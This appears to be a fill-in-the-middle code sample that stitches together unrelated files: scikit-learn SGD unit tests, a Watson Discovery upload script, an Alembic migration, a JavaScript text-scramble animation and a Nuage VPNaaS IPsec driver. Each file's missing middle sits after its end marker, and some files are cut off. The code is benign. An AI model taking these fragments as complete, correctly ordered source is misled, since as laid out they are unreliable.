clf3 = self.factory(alpha=0.01, eta0=0.01, n_iter=5, shuffle=False, warm_start=True, learning_rate=lr) clf3.fit(X, Y) assert_equal(clf3.t_, clf.t_) assert_array_almost_equal(clf3.coef_, clf.coef_) clf3.set_params(alpha=0.001) clf3.fit(X, Y) assert_equal(clf3.t_, clf2.t_) assert_array_almost_equal(clf3.coef_, clf2.coef_) def test_warm_start_constant(self): self._test_warm_start(X, Y, "constant") def test_warm_start_invscaling(self): self._test_warm_start(X, Y, "invscaling") def test_warm_start_optimal(self): self._test_warm_start(X, Y, "optimal") def test_input_format(self): """Input format tests. """ clf = self.factory(alpha=0.01, n_iter=5, shuffle=False) clf.fit(X, Y) Y_ = np.array(Y)[:, np.newaxis] Y_ = np.c_[Y_, Y_] assert_raises(ValueError, clf.fit, X, Y_) def test_clone(self): """Test whether clone works ok. """ clf = self.factory(alpha=0.01, n_iter=5, penalty='l1') clf = clone(clf) clf.set_params(penalty='l2') clf.fit(X, Y) clf2 = self.factory(alpha=0.01, n_iter=5, penalty='l2') clf2.fit(X, Y) assert_array_equal(clf.coef_, clf2.coef_) class DenseSGDClassifierTestCase(unittest.TestCase, CommonTest): """Test suite for the dense representation variant of SGD""" factory = SGDClassifier def test_sgd(self): """Check that SGD gives any results :-)""" for loss in ("hinge", "squared_hinge", "log", "modified_huber"): clf = self.factory(penalty='l2', alpha=0.01, fit_intercept=True, loss=loss, n_iter=10, shuffle=True) clf.fit(X, Y) #assert_almost_equal(clf.coef_[0], clf.coef_[1], decimal=7) assert_array_equal(clf.predict(T), true_result) @raises(ValueError) def test_sgd_bad_l1_ratio(self): """Check whether expected ValueError on bad l1_ratio""" self.factory(l1_ratio=1.1) @raises(ValueError) def test_sgd_bad_learning_rate_schedule(self): """Check whether expected ValueError on bad learning_rate""" self.factory(learning_rate="<unknown>") @raises(ValueError) def test_sgd_bad_eta0(self): """Check whether expected ValueError on bad eta0""" self.factory(eta0=0, learning_rate="constant") @raises(ValueError) def test_sgd_bad_alpha(self): """Check whether expected ValueError on bad alpha""" self.factory(alpha=-.1) @raises(ValueError) def test_sgd_bad_penalty(self): """Check whether expected ValueError on bad penalty""" self.factory(penalty='foobar', l1_ratio=0.85) @raises(ValueError) def test_sgd_bad_loss(self): """Check whether expected ValueError on bad loss""" self.factory(loss="foobar") @raises(ValueError) def test_sgd_n_iter_param(self): """Test parameter validity check""" self.factory(n_iter=-10000) @raises(ValueError) def test_sgd_shuffle_param(self): """Test parameter validity check""" self.factory(shuffle="false") @raises(TypeError) def test_argument_coef(self): """Checks coef_init not allowed as model argument (only fit)""" # Provided coef_ does not match dataset. self.factory(coef_init=np.zeros((3,))).fit(X, Y) @raises(ValueError) def test_provide_coef(self): """Checks coef_init shape for the warm starts""" # Provided coef_ does not match dataset. self.factory().fit(X, Y, coef_init=np.zeros((3,))) @raises(ValueError) def test_set_intercept(self): """Checks intercept_ shape for the warm starts""" # Provided intercept_ does not match dataset. self.factory().fit(X, Y, intercept_init=np.zeros((3,))) def test_set_intercept_binary(self): """Checks intercept_ shape for the warm starts in binary case""" self.factory().fit(X5, Y5, intercept_init=0) def test_set_intercept_to_intercept(self): """Checks intercept_ shape consistency for the warm starts""" # Inconsistent intercept_ shape. 
clf = self.factory().fit(X5, Y5) self.factory().fit(X5, Y5, intercept_init=clf.intercept_) clf = self.factory().fit(X, Y) self.factory().fit(X, Y, intercept_init=clf.intercept_) @raises(ValueError) def test_sgd_at_least_two_labels(self): """Target must have at least two labels""" self.factory(alpha=0.01, n_iter=20).fit(X2, np.ones(9)) def test_sgd_multiclass(self): """Multi-class test case""" clf = self.factory(alpha=0.01, n_iter=20).fit(X2, Y2) assert_equal(clf.coef_.shape, (3, 2)) assert_equal(clf.intercept_.shape, (3,)) assert_equal(clf.decision_function([0, 0]).shape, (1, 3)) pred = clf.predict(T2) assert_array_equal(pred, true_result2) def test_sgd_multiclass_with_init_coef(self): """Multi-class test case""" clf = self.factory(alpha=0.01, n_iter=20) clf.fit(X2, Y2, coef_init=np.zeros((3, 2)), intercept_init=np.zeros(3)) assert_equal(clf.coef_.shape, (3, 2)) assert_true(clf.intercept_.shape, (3,)) pred = clf.predict(T2) assert_array_equal(pred, true_result2) def test_sgd_multiclass_njobs(self): """Multi-class test case with multi-core support""" clf = self.factory(alpha=0.01, n_iter=20, n_jobs=2).fit(X2, Y2) assert_equal(clf.coef_.shape, (3, 2)) assert_equal(clf.intercept_.shape, (3,)) assert_equal(clf.decision_function([0, 0]).shape, (1, 3)) pred = clf.predict(T2) assert_array_equal(pred, true_result2) def test_set_coef_multiclass(self): """Checks coef_init and intercept_init shape for for multi-class problems""" # Provided coef_ does not match dataset clf = self.factory() assert_raises(ValueError, clf.fit, X2, Y2, coef_init=np.zeros((2, 2))) # Provided coef_ does match dataset clf = self.factory().fit(X2, Y2, coef_init=np.zeros((3, 2))) # Provided intercept_ does not match dataset clf = self.factory() assert_raises(ValueError, clf.fit, X2, Y2, intercept_init=np.zeros((1,))) # Provided intercept_ does match dataset. clf = self.factory().fit(X2, Y2, intercept_init=np.zeros((3,))) def test_sgd_proba(self): """Check SGD.predict_proba""" # hinge loss does not allow for conditional prob estimate clf = self.factory(loss="hinge", alpha=0.01, n_iter=10).fit(X, Y) assert_raises(NotImplementedError, clf.predict_proba, [3, 2]) # log and modified_huber losses can output probability estimates # binary case for loss in ["log", "modified_huber"]: clf = self.factory(loss="modified_huber", alpha=0.01, n_iter=10) clf.fit(X, Y) p = clf.predict_proba([3, 2]) assert_true(p[0, 1] > 0.5) p = clf.predict_proba([-1, -1]) assert_true(p[0, 1] < 0.5) p = clf.predict_log_proba([3, 2]) assert_true(p[0, 1] > p[0, 0]) p = clf.predict_log_proba([-1, -1]) assert_true(p[0, 1] < p[0, 0]) # log loss multiclass probability estimates clf = self.factory(loss="log", alpha=0.01, n_iter=10).fit(X2, Y2) d = clf.decision_function([[.1, -.1], [.3, .2]]) p = clf.predict_proba([[.1, -.1], [.3, .2]]) assert_array_equal(np.argmax(p, axis=1), np.argmax(d, axis=1)) assert_almost_equal(p[0].sum(), 1) assert_true(np.all(p[0] >= 0)) p = clf.predict_proba([-1, -1]) d = clf.decision_function([-1, -1]) assert_array_equal(np.argsort(p[0]), np.argsort(d[0])) l = clf.predict_log_proba([3, 2]) p = clf.predict_proba([3, 2]) assert_array_almost_equal(np.log(p), l) l = clf.predict_log_proba([-1, -1]) p = clf.predict_proba([-1, -1]) assert_array_almost_equal(np.log(p), l) # Modified Huber multiclass probability estimates; requires a separate # test because the hard zero/one probabilities may destroy the # ordering present in decision_function output. 
clf = self.factory(loss="modified_huber", alpha=0.01, n_iter=10) clf.fit(X2, Y2) d = clf.decision_function([3, 2]) p = clf.predict_proba([3, 2]) if not isinstance(self, SparseSGDClassifierTestCase): assert_equal(np.argmax(d, axis=1), np.argmax(p, axis=1))<|fim▁hole|> # the following sample produces decision_function values < -1, # which would cause naive normalization to fail (see comment # in SGDClassifier.predict_proba) x = X.mean(axis=0) d = clf.decision_function(x) if np.all(d < -1): # XXX not true in sparse test case (why?) p = clf.predict_proba(x) assert_array_almost_equal(p[0], [1/3.] * 3) def test_sgd_l1(self): """Test L1 regularization""" n = len(X4) rng = np.random.RandomState(13) idx = np.arange(n) rng.shuffle(idx) X = X4[idx, :] Y = Y4[idx] clf = self.factory(penalty='l1', alpha=.2, fit_intercept=False, n_iter=2000) clf.fit(X, Y) assert_array_equal(clf.coef_[0, 1:-1], np.zeros((4,))) pred = clf.predict(X) assert_array_equal(pred, Y) # test sparsify with dense inputs clf.sparsify() assert_true(sp.issparse(clf.coef_)) pred = clf.predict(X) assert_array_equal(pred, Y) # pickle and unpickle with sparse coef_ clf = pickle.loads(pickle.dumps(clf)) assert_true(sp.issparse(clf.coef_)) pred = clf.predict(X) assert_array_equal(pred, Y) def test_class_weights(self): """ Test class weights. """ X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0], [1.0, 1.0], [1.0, 0.0]]) y = [1, 1, 1, -1, -1] clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False, class_weight=None) clf.fit(X, y) assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1])) # we give a small weights to class 1 clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False, class_weight={1: 0.001}) clf.fit(X, y) # now the hyperplane should rotate clock-wise and # the prediction on this point should shift assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([-1])) def test_equal_class_weight(self): """Test if equal class weights approx. equals no class weights. 
""" X = [[1, 0], [1, 0], [0, 1], [0, 1]] y = [0, 0, 1, 1] clf = self.factory(alpha=0.1, n_iter=1000, class_weight=None) clf.fit(X, y) X = [[1, 0], [0, 1]] y = [0, 1] clf_weighted = self.factory(alpha=0.1, n_iter=1000, class_weight={0: 0.5, 1: 0.5}) clf_weighted.fit(X, y) # should be similar up to some epsilon due to learning rate schedule assert_almost_equal(clf.coef_, clf_weighted.coef_, decimal=2) @raises(ValueError) def test_wrong_class_weight_label(self): """ValueError due to not existing class label.""" clf = self.factory(alpha=0.1, n_iter=1000, class_weight={0: 0.5}) clf.fit(X, Y) @raises(ValueError) def test_wrong_class_weight_format(self): """ValueError due to wrong class_weight argument type.""" clf = self.factory(alpha=0.1, n_iter=1000, class_weight=[0.5]) clf.fit(X, Y) def test_auto_weight(self): """Test class weights for imbalanced data""" # compute reference metrics on iris dataset that is quite balanced by # default X, y = iris.data, iris.target X = scale(X) idx = np.arange(X.shape[0]) rng = np.random.RandomState(0) rng.shuffle(idx) X = X[idx] y = y[idx] clf = self.factory(alpha=0.0001, n_iter=1000, class_weight=None).fit(X, y) assert_almost_equal(metrics.f1_score(y, clf.predict(X)), 0.96, decimal=1) # make the same prediction using automated class_weight clf_auto = self.factory(alpha=0.0001, n_iter=1000, class_weight="auto").fit(X, y) assert_almost_equal(metrics.f1_score(y, clf_auto.predict(X)), 0.96, decimal=1) # Make sure that in the balanced case it does not change anything # to use "auto" assert_array_almost_equal(clf.coef_, clf_auto.coef_, 6) # build an very very imbalanced dataset out of iris data X_0 = X[y == 0, :] y_0 = y[y == 0] X_imbalanced = np.vstack([X] + [X_0] * 10) y_imbalanced = np.concatenate([y] + [y_0] * 10) # fit a model on the imbalanced data without class weight info clf = self.factory(n_iter=1000, class_weight=None) clf.fit(X_imbalanced, y_imbalanced) y_pred = clf.predict(X) assert_less(metrics.f1_score(y, y_pred), 0.96) # fit a model with auto class_weight enabled clf = self.factory(n_iter=1000, class_weight="auto") clf.fit(X_imbalanced, y_imbalanced) y_pred = clf.predict(X) assert_greater(metrics.f1_score(y, y_pred), 0.96) # fit another using a fit parameter override clf = self.factory(n_iter=1000, class_weight="auto") clf.fit(X_imbalanced, y_imbalanced) y_pred = clf.predict(X) assert_greater(metrics.f1_score(y, y_pred), 0.96) def test_sample_weights(self): """Test weights on individual samples""" X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0], [1.0, 1.0], [1.0, 0.0]]) y = [1, 1, 1, -1, -1] clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False) clf.fit(X, y) assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1])) # we give a small weights to class 1 clf.fit(X, y, sample_weight=[0.001] * 3 + [1] * 2) # now the hyperplane should rotate clock-wise and # the prediction on this point should shift assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([-1])) @raises(ValueError) def test_wrong_sample_weights(self): """Test if ValueError is raised if sample_weight has wrong shape""" clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False) # provided sample_weight too long clf.fit(X, Y, sample_weight=np.arange(7)) @raises(ValueError) def test_partial_fit_exception(self): clf = self.factory(alpha=0.01) # classes was not specified clf.partial_fit(X3, Y3) def test_partial_fit_binary(self): third = X.shape[0] // 3 clf = self.factory(alpha=0.01) classes = np.unique(Y) clf.partial_fit(X[:third], Y[:third], classes=classes) 
assert_equal(clf.coef_.shape, (1, X.shape[1])) assert_equal(clf.intercept_.shape, (1,)) assert_equal(clf.decision_function([0, 0]).shape, (1, )) id1 = id(clf.coef_.data) clf.partial_fit(X[third:], Y[third:]) id2 = id(clf.coef_.data) # check that coef_ haven't been re-allocated assert_true(id1, id2) y_pred = clf.predict(T) assert_array_equal(y_pred, true_result) def test_partial_fit_multiclass(self): third = X2.shape[0] // 3 clf = self.factory(alpha=0.01) classes = np.unique(Y2) clf.partial_fit(X2[:third], Y2[:third], classes=classes) assert_equal(clf.coef_.shape, (3, X2.shape[1])) assert_equal(clf.intercept_.shape, (3,)) assert_equal(clf.decision_function([0, 0]).shape, (1, 3)) id1 = id(clf.coef_.data) clf.partial_fit(X2[third:], Y2[third:]) id2 = id(clf.coef_.data) # check that coef_ haven't been re-allocated assert_true(id1, id2) def test_fit_then_partial_fit(self): """Partial_fit should work after initial fit in the multiclass case. Non-regression test for #2496; fit would previously produce a Fortran-ordered coef_ that subsequent partial_fit couldn't handle. """ clf = self.factory() clf.fit(X2, Y2) clf.partial_fit(X2, Y2) # no exception here def _test_partial_fit_equal_fit(self, lr): for X_, Y_, T_ in ((X, Y, T), (X2, Y2, T2)): clf = self.factory(alpha=0.01, eta0=0.01, n_iter=2, learning_rate=lr, shuffle=False) clf.fit(X_, Y_) y_pred = clf.decision_function(T_) t = clf.t_ classes = np.unique(Y_) clf = self.factory(alpha=0.01, eta0=0.01, learning_rate=lr, shuffle=False) for i in range(2): clf.partial_fit(X_, Y_, classes=classes) y_pred2 = clf.decision_function(T_) assert_equal(clf.t_, t) assert_array_almost_equal(y_pred, y_pred2, decimal=2) def test_partial_fit_equal_fit_constant(self): self._test_partial_fit_equal_fit("constant") def test_partial_fit_equal_fit_optimal(self): self._test_partial_fit_equal_fit("optimal") def test_partial_fit_equal_fit_invscaling(self): self._test_partial_fit_equal_fit("invscaling") def test_regression_losses(self): clf = self.factory(alpha=0.01, learning_rate="constant", eta0=0.1, loss="epsilon_insensitive") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) clf = self.factory(alpha=0.01, learning_rate="constant", eta0=0.1, loss="squared_epsilon_insensitive") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) clf = self.factory(alpha=0.01, loss="huber") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) clf = self.factory(alpha=0.01, learning_rate="constant", eta0=0.01, loss="squared_loss") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) def test_warm_start_multiclass(self): self._test_warm_start(X2, Y2, "optimal") def test_multiple_fit(self): """Test multiple calls of fit w/ different shaped inputs.""" clf = self.factory(alpha=0.01, n_iter=5, shuffle=False) clf.fit(X, Y) assert_true(hasattr(clf, "coef_")) # Non-regression test: try fitting with a different label set. 
y = [["ham", "spam"][i] for i in LabelEncoder().fit_transform(Y)] clf.fit(X[:, :-1], y) class SparseSGDClassifierTestCase(DenseSGDClassifierTestCase): """Run exactly the same tests using the sparse representation variant""" factory = SparseSGDClassifier ############################################################################### # Regression Test Case class DenseSGDRegressorTestCase(unittest.TestCase, CommonTest): """Test suite for the dense representation variant of SGD""" factory = SGDRegressor def test_sgd(self): """Check that SGD gives any results.""" clf = self.factory(alpha=0.1, n_iter=2, fit_intercept=False) clf.fit([[0, 0], [1, 1], [2, 2]], [0, 1, 2]) assert_equal(clf.coef_[0], clf.coef_[1]) @raises(ValueError) def test_sgd_bad_penalty(self): """Check whether expected ValueError on bad penalty""" self.factory(penalty='foobar', l1_ratio=0.85) @raises(ValueError) def test_sgd_bad_loss(self): """Check whether expected ValueError on bad loss""" self.factory(loss="foobar") def test_sgd_least_squares_fit(self): xmin, xmax = -5, 5 n_samples = 100 rng = np.random.RandomState(0) X = np.linspace(xmin, xmax, n_samples).reshape(n_samples, 1) # simple linear function without noise y = 0.5 * X.ravel() clf = self.factory(loss='squared_loss', alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.99) # simple linear function with noise y = 0.5 * X.ravel() + rng.randn(n_samples, 1).ravel() clf = self.factory(loss='squared_loss', alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.5) def test_sgd_epsilon_insensitive(self): xmin, xmax = -5, 5 n_samples = 100 X = np.linspace(xmin, xmax, n_samples).reshape(n_samples, 1) # simple linear function without noise y = 0.5 * X.ravel() clf = self.factory(loss='epsilon_insensitive', epsilon=0.01, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_true(score > 0.99) # simple linear function with noise y = 0.5 * X.ravel() \ + np.random.randn(n_samples, 1).ravel() clf = self.factory(loss='epsilon_insensitive', epsilon=0.01, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_true(score > 0.5) def test_sgd_huber_fit(self): xmin, xmax = -5, 5 n_samples = 100 rng = np.random.RandomState(0) X = np.linspace(xmin, xmax, n_samples).reshape(n_samples, 1) # simple linear function without noise y = 0.5 * X.ravel() clf = self.factory(loss="huber", epsilon=0.1, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.99) # simple linear function with noise y = 0.5 * X.ravel() + rng.randn(n_samples, 1).ravel() clf = self.factory(loss="huber", epsilon=0.1, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.5) def test_elasticnet_convergence(self): """Check that the SGD output is consistent with coordinate descent""" n_samples, n_features = 1000, 5 rng = np.random.RandomState(0) X = np.random.randn(n_samples, n_features) # ground_truth linear model that generate y from X and to which the # models should converge if the regularizer would be set to 0.0 ground_truth_coef = rng.randn(n_features) y = np.dot(X, ground_truth_coef) # XXX: alpha = 0.1 seems to cause convergence problems for alpha in [0.01, 0.001]: for l1_ratio in [0.5, 0.8, 1.0]: cd = linear_model.ElasticNet(alpha=alpha, l1_ratio=l1_ratio, fit_intercept=False) cd.fit(X, y) sgd = self.factory(penalty='elasticnet', n_iter=50, alpha=alpha, 
l1_ratio=l1_ratio, fit_intercept=False) sgd.fit(X, y) err_msg = ("cd and sgd did not converge to comparable " "results for alpha=%f and l1_ratio=%f" % (alpha, l1_ratio)) assert_almost_equal(cd.coef_, sgd.coef_, decimal=2, err_msg=err_msg) def test_partial_fit(self): third = X.shape[0] // 3 clf = self.factory(alpha=0.01) clf.partial_fit(X[:third], Y[:third]) assert_equal(clf.coef_.shape, (X.shape[1], )) assert_equal(clf.intercept_.shape, (1,)) assert_equal(clf.decision_function([0, 0]).shape, (1, )) id1 = id(clf.coef_.data) clf.partial_fit(X[third:], Y[third:]) id2 = id(clf.coef_.data) # check that coef_ haven't been re-allocated assert_true(id1, id2) def _test_partial_fit_equal_fit(self, lr): clf = self.factory(alpha=0.01, n_iter=2, eta0=0.01, learning_rate=lr, shuffle=False) clf.fit(X, Y) y_pred = clf.predict(T) t = clf.t_ clf = self.factory(alpha=0.01, eta0=0.01, learning_rate=lr, shuffle=False) for i in range(2): clf.partial_fit(X, Y) y_pred2 = clf.predict(T) assert_equal(clf.t_, t) assert_array_almost_equal(y_pred, y_pred2, decimal=2) def test_partial_fit_equal_fit_constant(self): self._test_partial_fit_equal_fit("constant") def test_partial_fit_equal_fit_optimal(self): self._test_partial_fit_equal_fit("optimal") def test_partial_fit_equal_fit_invscaling(self): self._test_partial_fit_equal_fit("invscaling") def test_loss_function_epsilon(self): clf = self.factory(epsilon=0.9) clf.set_params(epsilon=0.1) assert clf.loss_functions['huber'][1] == 0.1 class SparseSGDRegressorTestCase(DenseSGDRegressorTestCase): """Run exactly the same tests using the sparse representation variant""" factory = SparseSGDRegressor def test_l1_ratio(): """Test if l1 ratio extremes match L1 and L2 penalty settings. """ X, y = datasets.make_classification(n_samples=1000, n_features=100, n_informative=20, random_state=1234) # test if elasticnet with l1_ratio near 1 gives same result as pure l1 est_en = SGDClassifier(alpha=0.001, penalty='elasticnet', l1_ratio=0.9999999999).fit(X, y) est_l1 = SGDClassifier(alpha=0.001, penalty='l1').fit(X, y) assert_array_almost_equal(est_en.coef_, est_l1.coef_) # test if elasticnet with l1_ratio near 0 gives same result as pure l2 est_en = SGDClassifier(alpha=0.001, penalty='elasticnet', l1_ratio=0.0000000001).fit(X, y) est_l2 = SGDClassifier(alpha=0.001, penalty='l2').fit(X, y) assert_array_almost_equal(est_en.coef_, est_l2.coef_)<|fim▁end|>
else: # XXX the sparse test gets a different X2 (?) assert_equal(np.argmin(d, axis=1), np.argmin(p, axis=1))
<|file_name|>upload_training_data.py<|end_file_name|><|fim▁begin|>import json import os import glob import sys import logging from watson_developer_cloud import WatsonException if '__file__' in globals(): sys.path.insert(0, os.path.join(os.path.abspath(__file__), 'scripts')) else: sys.path.insert(0, os.path.join(os.path.abspath(os.getcwd()), 'scripts')) from discovery_setup_utils import ( # noqa discovery, curdir, get_constants, write_progress ) # set the DATA_TYPE the same to what was downloaded DATA_TYPE = 'travel' # set the TRAINING_PATH to the location of the training data relative # to the 'data' directory # by default, evaluates to <DATA_TYPE>/training TRAINING_PATH = os.path.join(DATA_TYPE, 'training') DATA_DIRECTORY = os.path.abspath(os.path.join(curdir, '..', 'data')) TRAINING_DIRECTORY = os.path.join(DATA_DIRECTORY, TRAINING_PATH) LOG_FILE_PATH = os.path.join(DATA_DIRECTORY, 'training_upload.log') logging.basicConfig(filename=LOG_FILE_PATH, filemode='w', format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO) def upload_training_doc(training_json, environment_id, collection_id): try: r = discovery.add_training_data_query( environment_id=environment_id, collection_id=collection_id, natural_language_query=training_json['natural_language_query'], examples=training_json['examples']) logging.info("Response:\n%s", json.dumps(r, indent=4)) except WatsonException as exception: logging.error(exception) def upload_training_data(training_directory): print("Training directory: %s" % training_directory)<|fim▁hole|> training_data_uploaded = 0 done_percent = 0 write_progress(training_data_uploaded, total_files) for file in files: with open(file, 'rb') as file_object: logging.info("Processing file: %s", file_object.name) upload_training_doc( json.loads(file_object.read()), discovery_constants['environment_id'], discovery_constants['collection_id']['trained'] ) training_data_uploaded += 1 done_percent = write_progress(training_data_uploaded, total_files, done_percent) logging.info("Finished uploading %d files", total_files) print("\nFinished uploading %d files" % total_files) print('Retrieving environment and collection constants...') """ retrieve the following: { environment_id: env_id, collection_id: { trained: trained_id } } """ discovery_constants = get_constants( discovery, trained_name=os.getenv( 'DISCOVERY_TRAINED_COLLECTION_NAME', 'knowledge_base_trained' ) ) print('Constants retrieved!') print(discovery_constants) print("Log file located at: %s" % LOG_FILE_PATH) upload_training_data(TRAINING_DIRECTORY)<|fim▁end|>
files = glob.glob(os.path.join(training_directory, '*.json')) total_files = len(files) print("Number of files to process: %d" % total_files)
<|file_name|>424f18f4c1df_.py<|end_file_name|><|fim▁begin|>"""empty message Revision ID: 424f18f4c1df Revises: 106e3631fe9 Create Date: 2015-06-23 11:31:08.548661 """ # revision identifiers, used by Alembic. revision = '424f18f4c1df' down_revision = '106e3631fe9' from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql from sqlalchemy.dialects.postgresql import ENUM providers_list = ENUM('facebook', 'twitter', 'truenth', name='providers', create_type=False) def upgrade(): ### commands auto generated by Alembic - please adjust! ### providers_list.create(op.get_bind(), checkfirst=False) op.create_table('auth_providers', sa.Column('id', sa.Integer(), nullable=False), sa.Column('provider', providers_list, nullable=True), sa.Column('provider_id', sa.Integer(), nullable=True), sa.Column('user_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),<|fim▁hole|> def downgrade(): ### commands auto generated by Alembic - please adjust! ### op.drop_table('auth_providers') providers_list.drop(op.get_bind(), checkfirst=False) ### end Alembic commands ###<|fim▁end|>
sa.PrimaryKeyConstraint('id') ) ### end Alembic commands ###
<|file_name|>database_cleanup.py<|end_file_name|><|fim▁begin|>from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import os
import sys
import json
import re
import uuid
import base64
import models
from models.movie_trailer_model import Base, MovieTrailerModel

<|fim▁hole|>
 print("%d rows were deleted from table" % rows)<|fim▁end|>
rows = models.delete_movie_trailers()
<|file_name|>animations.js<|end_file_name|><|fim▁begin|>import Chaffle from "chaffle"; const scrambleAuthor = () => { const elements = document.querySelectorAll("[data-chaffle]"); elements.forEach(el => { const chaffle = new Chaffle(el, { speed: 10,<|fim▁hole|> chaffle.init(); }); }); }; export { scrambleAuthor };<|fim▁end|>
delay: 20, }); el.addEventListener("mouseover", () => {
<|file_name|>driver.py<|end_file_name|><|fim▁begin|># Copyright 2016 Nuage Netowrks USA Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import abc import copy import os import oslo_messaging import six from neutron.agent.linux import ip_lib from neutron.common import rpc as n_rpc from neutron import context from neutron_lib import constants from neutron_lib.plugins import directory from neutron_vpnaas.services.vpn import device_drivers from neutron_vpnaas.services.vpn.device_drivers import fedora_strongswan_ipsec from neutron_vpnaas.services.vpn.device_drivers import ipsec from neutron_vpnaas.services.vpn.device_drivers import strongswan_ipsec from nuage_neutron.vpnaas.common import topics from nuage_neutron.vpnaas.nuage_interface import NuageInterfaceDriver from oslo_concurrency import lockutils from oslo_config import cfg from oslo_log import log as logging from oslo_service import loopingcall LOG = logging.getLogger(__name__) TEMPLATE_PATH = os.path.dirname(os.path.abspath(__file__)) IPSEC_CONNS = 'ipsec_site_connections' class NuageIPsecVpnDriverApi(object): """IPSecVpnDriver RPC api.""" def __init__(self, topic): target = oslo_messaging.Target(topic=topic, version='1.0') self.client = n_rpc.get_client(target) def get_vpn_services_on_host(self, context, host): """Get list of vpnservices. The vpnservices including related ipsec_site_connection, ikepolicy and ipsecpolicy on this host """ cctxt = self.client.prepare() return cctxt.call(context, 'get_vpn_services_on_host', host=host) def update_status(self, context, status): """Update local status. This method call updates status attribute of VPNServices. """ cctxt = self.client.prepare() return cctxt.call(context, 'update_status', status=status) @six.add_metaclass(abc.ABCMeta) class NuageIPsecDriver(device_drivers.DeviceDriver): def __init__(self, vpn_service, host): self.conf = vpn_service.conf self.host = host self.conn = n_rpc.create_connection(new=True) self.context = context.get_admin_context_without_session() self.topic = topics.NUAGE_IPSEC_AGENT_TOPIC self.processes = {} self.routers = {} self.process_status_cache = {} self.endpoints = [self] self.conn.create_consumer(self.topic, self.endpoints) self.conn.consume_in_threads() self.agent_rpc = NuageIPsecVpnDriverApi( topics.NUAGE_IPSEC_DRIVER_TOPIC) self.process_status_cache_check = loopingcall.FixedIntervalLoopingCall( self.report_status, self.context) self.process_status_cache_check.start( interval=20) self.nuage_if_driver = NuageInterfaceDriver(cfg.CONF) def _get_l3_plugin(self): return directory.get_plugin(constants.L3) def get_namespace(self, router_id): """Get namespace of router. :router_id: router_id :returns: namespace string. """ return 'vpn-' + router_id def vpnservice_updated(self, context, **kwargs): """Vpnservice updated rpc handler VPN Service Driver will call this method when vpnservices updated. Then this method start sync with server. 
""" router = kwargs.get('router', None) self.sync(context, [router] if router else []) def tracking(self, context, **kwargs): """Handling create router event. Agent calls this method, when the process namespace is ready. Note: process_id == router_id == vpnservice_id """ router = kwargs.get('router', None) process_id = router['id'] self.routers[process_id] = process_id if process_id in self.processes: # In case of vpnservice is created # before vpn service namespace process = self.processes[process_id] process.enable() def non_tracking(self, context, **kwargs): router = kwargs.get('router', None) process_id = router['id'] self.destroy_process(process_id) if process_id in self.routers: del self.routers[process_id] def ensure_process(self, process_id, vpnservice=None): """Ensuring process. If the process doesn't exist, it will create process and store it in self.processs """ process = self.processes.get(process_id) if not process or not process.namespace: namespace = self.get_namespace(process_id) process = self.create_process( process_id, vpnservice, namespace) self.processes[process_id] = process elif vpnservice: process.update_vpnservice(vpnservice) return process @lockutils.synchronized('vpn-agent', 'neutron-') def sync(self, context, routers): """Sync status with server side. :param context: context object for RPC call :param routers: Router objects which is created in this sync event There could be many failure cases should be considered including the followings. 1) Agent class restarted 2) Failure on process creation 3) VpnService is deleted during agent down 4) RPC failure In order to handle, these failure cases, the driver needs to take sync strategies. """ vpnservices = self.agent_rpc.get_vpn_services_on_host( context, self.host) router_ids = [vpnservice['router_id'] for vpnservice in vpnservices] sync_router_ids = [router['id'] for router in routers] self._sync_vpn_processes(vpnservices, sync_router_ids) self._delete_vpn_processes(sync_router_ids, router_ids) self._cleanup_stale_vpn_processes(router_ids) self.report_status(context) def get_process_status_cache(self, process): if not self.process_status_cache.get(process.id): self.process_status_cache[process.id] = { 'status': None, 'id': process.vpnservice['id'], 'updated_pending_status': False, 'ipsec_site_connections': {}} return self.process_status_cache[process.id] def report_status(self, context): status_changed_vpn_services = [] for process in self.processes.values(): previous_status = self.get_process_status_cache(process) if self.is_status_updated(process, previous_status): new_status = self.copy_process_status(process) self.update_downed_connections(process.id, new_status) status_changed_vpn_services.append(new_status) self.process_status_cache[process.id] = ( self.copy_process_status(process)) # We need unset updated_pending status after it # is reported to the server side self.unset_updated_pending_status(process) if status_changed_vpn_services: self.agent_rpc.update_status(context, status_changed_vpn_services) def _sync_vpn_processes(self, vpnservices, sync_router_ids): for vpnservice in vpnservices: if vpnservice['router_id'] not in self.processes or ( vpnservice['router_id'] in sync_router_ids): process = self.ensure_process(vpnservice['router_id'], vpnservice=vpnservice) router = self.routers.get(vpnservice['router_id']) if not router: continue process.update() def _delete_vpn_processes(self, sync_router_ids, vpn_router_ids): for process_id in sync_router_ids: if process_id not in 